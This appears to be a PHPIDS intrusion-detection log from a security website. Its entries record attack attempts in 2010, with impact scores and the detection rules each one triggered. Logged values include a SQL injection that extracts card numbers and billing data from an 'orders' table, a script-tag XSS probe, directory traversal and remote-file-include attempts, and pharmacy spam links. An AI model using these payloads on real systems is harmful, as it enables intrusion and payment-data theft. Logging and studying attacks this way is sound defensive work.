| ID: | 123169 | | Name: | REQUEST.PREF | | Value: | ID=2283e1cd43badac9:U=129d3114eaa9083d:TM=1265974470:LM=1266026619:GM=1:S=kPg9-hDbFDDD0SkR | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 80.239.242.94 | | Impact: | 20 | | Created: | 2010-05-01 16:45:52 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 123170 | | Name: | COOKIE.PREF | | Value: | ID=2283e1cd43badac9:U=129d3114eaa9083d:TM=1265974470:LM=1266026619:GM=1:S=kPg9-hDbFDDD0SkR | | Page: | /i.php?page=security/zipit-z2-hacking-userland-side-track | | IP: | 80.239.242.94 | | Impact: | 20 | | Created: | 2010-05-01 16:45:52 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
|
| ID: | 123167 | | Name: | REQUEST.codeme | | Value: | Nice, <a href= http://canyousafelytakealevitraa.imagekind.com/#1 >All about can you safely take a levitra along with a penile injection</a> [url=http://canyousafelytakealevitraa.imagekind.com/#1]All about can you safely take a levitra along with a penile injection[/url], wxerb, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 11:06:20 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123168 | | Name: | POST.codeme | | Value: | Nice, <a href= http://canyousafelytakealevitraa.imagekind.com/#1 >All about can you safely take a levitra along with a penile injection</a> [url=http://canyousafelytakealevitraa.imagekind.com/#1]All about can you safely take a levitra along with a penile injection[/url], wxerb, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 11:06:20 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123165 | | Name: | REQUEST.testimonial_id | | Value: | -42 union select 1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8 from orders-- | | Page: | /i.php?testimonial_id=-42+union+select+1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_ex | | IP: | 67.195.111.36 | | Impact: | 24 | | Created: | 2010-05-01 10:58:45 | | Details: | Description: Detects JavaScript string properties and methods | Tags: xss, csrf, id, rfe | ID: 19 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123166 | | Name: | GET.testimonial_id | | Value: | -42 union select 1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8 from orders-- | | Page: | /i.php?testimonial_id=-42+union+select+1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_ex | | IP: | 67.195.111.36 | | Impact: | 24 | | Created: | 2010-05-01 10:58:45 | | Details: | Description: Detects JavaScript string properties and methods | Tags: xss, csrf, id, rfe | ID: 19 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123163 | | Name: | REQUEST.page | | Value: | videos/wardrive1 href="http://www.irongeek.com/i.php? | | Page: | /i.php?page=videos/wardrive1%20href=%22http://www.irongeek.com/i.php? | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-01 10:16:23 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123164 | | Name: | GET.page | | Value: | videos/wardrive1 href="http://www.irongeek.com/i.php? | | Page: | /i.php?page=videos/wardrive1%20href=%22http://www.irongeek.com/i.php? | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-01 10:16:23 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123161 | | Name: | REQUEST.codeme | | Value: | Where it is possible to buy the, <a href= http://prescriptionandconsultati.imagekind.com/#1 >prescription and consultation online for adipex</a> [url=http://prescriptionandconsultati.imagekind.com/#1]prescription and consultation online for adipex[/url], 73773, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 10:16:02 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123162 | | Name: | POST.codeme | | Value: | Where it is possible to buy the, <a href= http://prescriptionandconsultati.imagekind.com/#1 >prescription and consultation online for adipex</a> [url=http://prescriptionandconsultati.imagekind.com/#1]prescription and consultation online for adipex[/url], 73773, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 10:16:02 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123159 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=links | | Page: | /i.php?page=videos/pn12/i.php?page=links | | IP: | 204.236.253.89 | | Impact: | 10 | | Created: | 2010-05-01 09:37:25 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123160 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=links | | Page: | /i.php?page=videos/pn12/i.php?page=links | | IP: | 204.236.253.89 | | Impact: | 10 | | Created: | 2010-05-01 09:37:25 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123157 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=contact | | Page: | /i.php?page=videos/pn12/i.php?page=contact | | IP: | 204.236.253.89 | | Impact: | 10 | | Created: | 2010-05-01 09:37:24 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123158 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=contact | | Page: | /i.php?page=videos/pn12/i.php?page=contact | | IP: | 204.236.253.89 | | Impact: | 10 | | Created: | 2010-05-01 09:37:24 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123155 | | Name: | REQUEST.codeme | | Value: | Your Site Is Great!, <a href= http://discountviagrafurthermore.imagekind.com/ >discount viagra furthermore cheap adipex reviews</a>, [url= http://discountviagrafurthermore.imagekind.com/ ]discount viagra furthermore cheap adipex reviews[/url], 56349, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-05-01 09:26:09 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123156 | | Name: | POST.codeme | | Value: | Your Site Is Great!, <a href= http://discountviagrafurthermore.imagekind.com/ >discount viagra furthermore cheap adipex reviews</a>, [url= http://discountviagrafurthermore.imagekind.com/ ]discount viagra furthermore cheap adipex reviews[/url], 56349, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-05-01 09:26:09 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123153 | | Name: | REQUEST.codeme | | Value: | So where it to find, <a href= http://discountviagrafurthermore.imagekind.com/#1 >discount viagra furthermore cheap adipex reviews</a> [url=http://discountviagrafurthermore.imagekind.com/#1]discount viagra furthermore cheap adipex reviews[/url], :-(, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-05-01 08:36:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123154 | | Name: | POST.codeme | | Value: | So where it to find, <a href= http://discountviagrafurthermore.imagekind.com/#1 >discount viagra furthermore cheap adipex reviews</a> [url=http://discountviagrafurthermore.imagekind.com/#1]discount viagra furthermore cheap adipex reviews[/url], :-(, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-05-01 08:36:03 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123151 | | Name: | REQUEST.codeme | | Value: | Best, <a href= http://howlongdoesittakeadipexto.imagekind.com/#1 >Only how long does it take adipex to work</a> [url=http://howlongdoesittakeadipexto.imagekind.com/#1]Only how long does it take adipex to work[/url], kscrsp, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 34 | | Created: | 2010-05-01 07:45:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123152 | | Name: | POST.codeme | | Value: | Best, <a href= http://howlongdoesittakeadipexto.imagekind.com/#1 >Only how long does it take adipex to work</a> [url=http://howlongdoesittakeadipexto.imagekind.com/#1]Only how long does it take adipex to work[/url], kscrsp, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 34 | | Created: | 2010-05-01 07:45:57 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123149 | | Name: | REQUEST.page | | Value: | reviews/dreamhost/.php?page=' | | Page: | /i.php?page=reviews/dreamhost/.php?page=' | | IP: | 79.170.45.240 | | Impact: | 10 | | Created: | 2010-05-01 07:28:55 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123150 | | Name: | GET.page | | Value: | reviews/dreamhost/.php?page=' | | Page: | /i.php?page=reviews/dreamhost/.php?page=' | | IP: | 79.170.45.240 | | Impact: | 10 | | Created: | 2010-05-01 07:28:55 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123147 | | Name: | REQUEST.codeme | | Value: | I like your work!, <a href= http://howlongdoestramadolstayin.imagekind.com/#1 >Only how long does tramadol stay in your system</a> [url=http://howlongdoestramadolstayin.imagekind.com/#1]Only how long does tramadol stay in your system[/url], >:-)), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 48 | | Created: | 2010-05-01 06:55:44 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123148 | | Name: | POST.codeme | | Value: | I like your work!, <a href= http://howlongdoestramadolstayin.imagekind.com/#1 >Only how long does tramadol stay in your system</a> [url=http://howlongdoestramadolstayin.imagekind.com/#1]Only how long does tramadol stay in your system[/url], >:-)), | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 48 | | Created: | 2010-05-01 06:55:44 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123143 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=mobile-device-hacking | | Page: | /i.php?page=videos/pn12/i.php?page=mobile-device-hacking | | IP: | 184.73.16.1 | | Impact: | 10 | | Created: | 2010-05-01 06:09:31 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123144 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=mobile-device-hacking | | Page: | /i.php?page=videos/pn12/i.php?page=mobile-device-hacking | | IP: | 184.73.16.1 | | Impact: | 10 | | Created: | 2010-05-01 06:09:31 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123145 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=books | | Page: | /i.php?page=videos/pn12/i.php?page=books | | IP: | 184.73.16.1 | | Impact: | 10 | | Created: | 2010-05-01 06:09:31 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123146 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=books | | Page: | /i.php?page=videos/pn12/i.php?page=books | | IP: | 184.73.16.1 | | Impact: | 10 | | Created: | 2010-05-01 06:09:31 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123141 | | Name: | REQUEST.codeme | | Value: | Your Site Is Great!, <a href= http://tramadolmoreaddictingthan.imagekind.com/#1 >tramadol more addicting than vicodin</a> [url=http://tramadolmoreaddictingthan.imagekind.com/#1]tramadol more addicting than vicodin[/url], >:]]], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 06:05:41 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123142 | | Name: | POST.codeme | | Value: | Your Site Is Great!, <a href= http://tramadolmoreaddictingthan.imagekind.com/#1 >tramadol more addicting than vicodin</a> [url=http://tramadolmoreaddictingthan.imagekind.com/#1]tramadol more addicting than vicodin[/url], >:]]], | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 06:05:41 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123139 | | Name: | REQUEST.codeme | | Value: | :-(, <a href= http://cialisinjuryattorneyohio.imagekind.com/#1 >cialis injury attorney ohio for you</a> [url=http://cialisinjuryattorneyohio.imagekind.com/#1]cialis injury attorney ohio for you[/url], qqn, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-05-01 05:15:48 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123140 | | Name: | POST.codeme | | Value: | :-(, <a href= http://cialisinjuryattorneyohio.imagekind.com/#1 >cialis injury attorney ohio for you</a> [url=http://cialisinjuryattorneyohio.imagekind.com/#1]cialis injury attorney ohio for you[/url], qqn, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-05-01 05:15:48 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: (((+::
|
| ID: | 123137 | | Name: | REQUEST.page | | Value: | ../sigs/logo.php | | Page: | /i.php?page=../sigs/logo.php | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-01 04:45:29 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
|
| ID: | 123138 | | Name: | GET.page | | Value: | ../sigs/logo.php | | Page: | /i.php?page=../sigs/logo.php | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-05-01 04:45:29 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
|
| ID: | 123135 | | Name: | REQUEST.codeme | | Value: | Give somebody the to a site about the, <a href= http://howlongdoesittakecialisto.imagekind.com/ >how long does it take cialis to work</a>, [url= http://howlongdoesittakecialisto.imagekind.com/ ]how long does it take cialis to work[/url], fuyc, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-05-01 04:26:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123136 | | Name: | POST.codeme | | Value: | Give somebody the to a site about the, <a href= http://howlongdoesittakecialisto.imagekind.com/ >how long does it take cialis to work</a>, [url= http://howlongdoesittakecialisto.imagekind.com/ ]how long does it take cialis to work[/url], fuyc, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-05-01 04:26:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123133 | | Name: | REQUEST.page | | Value: | backtrack-3'-man/nemesis-ip | | Page: | /i.php?page=backtrack-3'-man/nemesis-ip | | IP: | 123.17.177.94 | | Impact: | 14 | | Created: | 2010-05-01 04:11:24 | | Details: | Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123134 | | Name: | GET.page | | Value: | backtrack-3'-man/nemesis-ip | | Page: | /i.php?page=backtrack-3'-man/nemesis-ip | | IP: | 123.17.177.94 | | Impact: | 14 | | Created: | 2010-05-01 04:11:24 | | Details: | Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123131 | | Name: | REQUEST.page | | Value: | /?a=or1=1-- | | Page: | /i.php?page=/?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-01 03:29:59 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123132 | | Name: | GET.page | | Value: | /?a=or1=1-- | | Page: | /i.php?page=/?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-01 03:29:59 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123129 | | Name: | REQUEST.codeme | | Value: | Help me to find the, <a href= http://willxanaxandoxycodoneshow.imagekind.com/#1 >Real will xanax and oxycodone show up in a hair drug test</a> [url=http://willxanaxandoxycodoneshow.imagekind.com/#1]Real will xanax and oxycodone show up in a hair drug test[/url], 7014, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 01:56:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123130 | | Name: | POST.codeme | | Value: | Help me to find the, <a href= http://willxanaxandoxycodoneshow.imagekind.com/#1 >Real will xanax and oxycodone show up in a hair drug test</a> [url=http://willxanaxandoxycodoneshow.imagekind.com/#1]Real will xanax and oxycodone show up in a hair drug test[/url], 7014, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-05-01 01:56:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123127 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 123.26.124.59 | | Impact: | 20 | | Created: | 2010-05-01 01:55:14 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123128 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 123.26.124.59 | | Impact: | 20 | | Created: | 2010-05-01 01:55:14 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123125 | | Name: | REQUEST.page | | Value: | security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon | | Page: | /i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon | | IP: | 123.26.124.59 | | Impact: | 20 | | Created: | 2010-05-01 01:54:56 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123126 | | Name: | GET.page | | Value: | security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon | | Page: | /i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon | | IP: | 123.26.124.59 | | Impact: | 20 | | Created: | 2010-05-01 01:54:56 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123123 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 88.235.120.134 | | Impact: | 10 | | Created: | 2010-05-01 01:49:13 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123124 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 88.235.120.134 | | Impact: | 10 | | Created: | 2010-05-01 01:49:13 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123121 | | Name: | REQUEST.codeme | | Value: | Very interesting sites., <a href= http://howmanydaysdoesxanaxstayi.imagekind.com/#1 >Only how many days does xanax stay in your system</a> [url=http://howmanydaysdoesxanaxstayi.imagekind.com/#1]Only how many days does xanax stay in your system[/url], jxxvg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 34 | | Created: | 2010-05-01 00:15:40 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123122 | | Name: | POST.codeme | | Value: | Very interesting sites., <a href= http://howmanydaysdoesxanaxstayi.imagekind.com/#1 >Only how many days does xanax stay in your system</a> [url=http://howmanydaysdoesxanaxstayi.imagekind.com/#1]Only how many days does xanax stay in your system[/url], jxxvg, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 34 | | Created: | 2010-05-01 00:15:40 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects possible event handlers | Tags: xss, csrf | ID: 32 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 123119 | | Name: | REQUEST.codeme | | Value: | It is a very good thing, <a href= http://doesxanaxshowupondrugtest.imagekind.com/ >does xanax show up on drug tests</a>, [url= http://doesxanaxshowupondrugtest.imagekind.com/ ]does xanax show up on drug tests[/url], >:OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 23:25:36 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123120 | | Name: | POST.codeme | | Value: | It is a very good thing, <a href= http://doesxanaxshowupondrugtest.imagekind.com/ >does xanax show up on drug tests</a>, [url= http://doesxanaxshowupondrugtest.imagekind.com/ ]does xanax show up on drug tests[/url], >:OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 24 | | Created: | 2010-04-30 23:25:36 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 123117 | | Name: | REQUEST.test | | Value: | "><script>eval(window.name)</script> | | Page: | /i.php?test=%22%3e%3cscript%3eeval(window.name)%3c/script%3e | | IP: | 67.195.111.36 | | Impact: | 72 | | Created: | 2010-04-30 21:43:11 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
